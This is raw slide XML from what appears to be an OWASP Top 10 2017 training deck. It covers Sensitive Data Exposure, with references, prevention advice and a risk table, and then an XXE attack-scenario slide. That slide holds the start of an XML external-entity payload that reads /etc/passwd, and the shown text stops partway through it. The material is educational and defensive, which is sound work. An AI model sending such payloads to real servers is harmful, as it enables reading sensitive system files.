                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Protect Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard (V7,9,10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Cheat Sheet - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Transport Layer Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet - User Privacy Protection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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet - Password Storage</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10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cryptographic Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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11"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP Testing Guide - Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13"/>
            </a:endParaRP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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE-359 Exposure of Private Information (Privacy Violation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>CWE-220 Exposure of sens. information through data queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t> CWE-310: Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do the following, at a minimum and consult the references:</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Classify data processed, stored or transmitted by a system. Apply controls as per the classification.</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Review the privacy laws or regulations applicable to sensitive data, and protect as per regulatory requirements</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Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data you don’t retain can’t be stolen.</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Make sure you encrypt all sensitive data at rest </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Encrypt all data in transit, such as using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS).</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Ensure up-to-date and strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>crypto modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Ensure passwords are stored with a strong adaptive algorithm appropriate for password protection, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="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22"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="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23"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Configure the work factor (delay factor) as high as you can tolerate.</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Disable caching for response that contain sensitive data.</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Verify independently the effectiveness of your settings.</a:t>
            </a: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A3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3848396451"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957600"/>
          <a:ext cx="6861600" cy="215772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pPr>
                        <a:buNone/>
                      </a:pPr>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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pP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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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0" kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Even anonymous attackers typically don’t break crypto directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manual attack is generally required.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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atin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data in rest. Both with very varying exploitability.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0">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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive personal information (PII) data such as health records, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" err="1">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>cre-dentials</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, personal data, credit cards, which often requires protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">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544603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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Numerous public XXE issues have been discovered, including attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The easiest way is to upload a malicious XML file, if accepted:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The attacker  attempts to extract data from the server:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
